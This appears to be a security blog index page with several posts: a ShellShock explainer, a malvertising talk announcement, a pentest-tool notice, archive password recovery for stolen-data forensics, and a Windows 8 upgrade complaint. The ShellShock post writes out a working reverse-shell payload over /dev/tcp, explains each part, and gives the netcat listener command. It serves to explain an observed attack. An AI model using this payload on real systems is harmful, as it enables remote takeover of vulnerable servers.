Exploiting ShellShock getting a reverse shell

A Bash Vulnerability (aka ShellShock) has been published two months ago (CVE-2014-6271 original release date 09/24/2014) reaching the highest score for Impact and Exploitability by NIST-NVD with the following overview:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

The first patch released was partial and introduced another vulnerability (CVE-2014-7169 original release date 09/24/2014)  again with top score for Impact and Exploitability by NIST-NVD with the following overview (highlight is mine):

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271

Two months after, ShellShock is still on the wild, used to exploit thousands systems all around the net, installing php/perl/irc shell or any other malicious payload. This is possible because the original SehellShock vulnerability is now related to other five CVEs:

  • CVE-2014-6271 (Initial report)
  • CVE-2014-6277
  • CVE-2014-6278
  • CVE-2014-7169
  • CVE-2014-7186
  • CVE-2014-7187

The following image, taken from F5 Website, explain how ShellShock works and why it is very dangerous:

She

Basically,exploiting this vulnerability, you can run every command (or every commands sequence) , but in 90% of cases I found the final target as a shell installation, usually in five steps:

  1. Vulnerability exploiting
  2. Script (perl, bash, c, etc…) download from a remote site via wget, curl, etc…
  3. Script saving under /tmp
  4. Script execution
  5. Cleaning (remove /tmp original file)

In many cases this approach will fail because perl/php/c shell are detected and removed by security safeguards used to protect systems and remote sites could be blocked by Web Filtering policies. In recent days, however, I noticed a specific attack that does not use any malicious code, but only a system script:

() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

Let me explain better:

() { ignored;}; is the ShellShock exploit
/bin/bash -i is an interactive Bash session
>& /dev/tcp/ip/port redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 read the satndard input. This should be 0<&1 but it works well in both cases

On the remote server a listener must be running: for testing I used  nc -l 8080 (netcat listening on port 8080)

This is a very interesting approach about exploiting ShellShock getting a reverse shell :)

Malvertising: una minaccia in espansione

Today the speech “Malvertising: una minaccia in espansione” has been hosted by “Festival ICT 2014″ in room 9 at 2:25 PM.
Giacomo Milani and I have talked about Malvertising threats, infections trend, attack vectors and exploiting techniques.
We also have explained how to prevent risks related to Malvertising.

From ICT Festival abstract on “Malvertising: una minaccia in espansione” (in Italian):

“Negli ultimi dodici mesi le minacce provenienti dal web hanno una nuova piattaforma di diffusione: i circuiti di Web Advertising. Sempre più internet publisher, siano essi blogger o aziende, offrono parte del proprio spazio web per la pubblicazione di inserzioni pubblicitarie al fine di ottenere profitti. Gran parte dei siti web che visitiamo quotidianamente propongono offerte basate sui nostri interessi, le nostre ricerche e le nostre abitudini, permettendo all’inserzionista di essere estremamente efficace. Questa caratteristica viene però sempre più sfruttata anche per distribuire malware e codice malevolo. Durante l’intervento analizzeremo l’evoluzione del fenomeno, le tecniche utilizzate e le relative contromisure.”

If you would like to download  “Malvertising: una minaccia in espansione” slides check out my SlideShare account on http://www.slideshare.net/fantaghost

FgScanner included in BlackArch Linux

FgScanner has been included in BlackArch Linux. What is BlackArch Linux ?

“BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers and security researchers.

The repository contains 1059 tools. You can install tools individually or in groups. BlackArch is compatible with existing Arch installs. For more information, see the installation instructions. Please note that although BlackArch is past the beta stage, it is still a relatively new project. To report bugs and request new tools, please visit the issue tracker on Github, stop by IRC, or email us.”

[Read more…]

Malware related archives decryption using strings command

Cyber attacks landscape is evolving rapidly, reaching high levels of sophistication and complexity in order to exploit and breach enterprises, government entities, universities, financial institutions, etc… even in presence of properly designed and well maintained defense-in-depth strategies. Basically the main stages of a targeted attacks attack can  be summarized in the following five steps:

  • Investigate
  • Infiltrate
  • Explore
  • Exfiltrate
  • Maintain Access

Each stage needs advanced tools and techniques in order to be completed stealthy and often the tools are very specific for each target. In many cases, that tools are created and coded by cybercriminals few hours ago before their deployment in the targeted network to avoid detection systems and signature based analysis. Besides these tools, however, are also used commercial utilities to perform many other activities like encryption, packaging, remote exec, remote access, etc…

RAR and ZIP archives are commonly used to compress and encrypt stolen data during the exfiltration phase of the attack. RAR format is preferred to ZIP thanks to it’s AES-256 encryption, command line utilities for many architectures and operating systems, archive-content encryption, etc…

Very often this archives are generated automatically by malware, scheduled tasks, command line utilities or attackers actions and could be identified by the filename structure in the infected filesystems or after a Forensics Analysis: YEAR_MONTH_DAY_USERID_HOSTNAME.RAR or similar as example.

If the archive content listing is blocked or encrypted, we cannot understand which data are included in the stolen archives and we have to start a password recovery task in order to open the files.
There are several options to achieve the goal:

  • free or commercial tools on a single host
  • commercial tools for distributed tasks over several machines
  • online password recovery services
  • GPU cracking utils
  • hardware acceleration based on FPGA

Each method listed above could require hours, days, months or years to be completed depending on the password length and/or complexity used to protect the files, but we can speed up the process using a very specific dictionary file containing malware-related strings.

[Read more…]

Windows 8 upgrade: the nightmare begin

Some days ago I was asked to help a friend to choose a new laptop: she explain me her budget, the target applications and her needs. At the end of the scouting process we decide together to buy an Asus N550L notebook.
The configuration is awesome: Intel i7-4500U, 8Gb RAM, 1Tb hard drive at 5400rpm (this is the real bottleneck!!!), Nvidia Geforce 745M with 4Gb, Bluetooth 4.0, aluminium case everything packed in a 15,6″ form factor.

First of all I would like to buy a Windows 7 Professional license and downgrade the system but the vendor told me that Windows 7 is not supported by Asus on N550L. Searching on Asus website I found drivers and utilities for Windows 8 only…….I’m really disappointed about this because I’m quite sure that Windows 7 is not yet in End Of LIfe ! Anyway: I move on B plan and I decide to upgrade to Windows 8.1 Update 1 a suggested by Microsoft in order to work in Desktop mode….I’m sure she will appreciate the “new” look’n’feel…

At 5pm I start the laptop unboxing (the Asus package is very well done and really accurate) and the first Windows setup. I click on the Store box in order to start Windows upgrade, but the system require to have all the last updates installed before start. The first round was composed of about 80 updates…..and require a reboot. The second round was composed of about 20 new updates….and require a reboot….the last round was dedicated to drivers upgrade and require a reboot. Well done, after about 1 hours installing updates and rebooting the laptop I’m finally ready to start the upgrade. I choose the upgrade box in Microsoft Store and the system told me that it needs to download 3,2 Gb ! Really 3,2 Gb ! This is an upgrade ? And what about a fresh install instead ? Crazy…. As probably you know in Italy we are not famous for ADSL broadband connections speed (we are not famous for many others things but doesn’t matter) so the download has required about 2 hours on 7Mbit/s….

[Read more…]